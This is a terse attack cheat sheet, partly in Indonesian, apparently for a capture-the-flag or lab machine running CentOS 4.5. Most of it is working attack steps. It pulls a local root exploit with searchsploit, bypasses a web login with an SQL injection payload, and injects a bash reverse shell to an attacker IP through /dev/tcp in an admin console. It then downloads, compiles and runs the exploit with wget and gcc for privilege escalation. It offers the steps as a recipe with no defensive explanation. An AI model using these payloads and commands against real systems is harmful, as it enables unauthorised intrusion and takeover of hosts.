Persiapan 

  Terminal 1
    	searchsploit centos 4.5 
    	searchsploit -m linux_x86/local/9542.c
    	python -m http.server 80


  Terminal 2 or Terminal Server
	ifconfig
    	nc -lnvp 1234

Mulai
  Terminal 3
	  sudo netdiscover


  Open Web 
	  username = 'or 1=1--
	  password = 'or 1=1--
	  uname=%27or+1%3D1--&psw=%27or+1%3D1--&btnLogin=Login

  Administrative Web Console
	  ;bash -i >& /dev/tcp/192.168.#.#/1234 0>&1
	  ip=%3Bbash+-i+%3E%26+%2Fdev%2Ftcp%2F192.168.#.#%2F1234+0%3E%261&submit=submit
	
	
  Terminal 2 or Terminal Server
	  lsb_release -a
	  cd /tmp && wget 192.168.#.#:80/9542.c && gcc 9542.c -o agung && ./agung
	  whoami

	
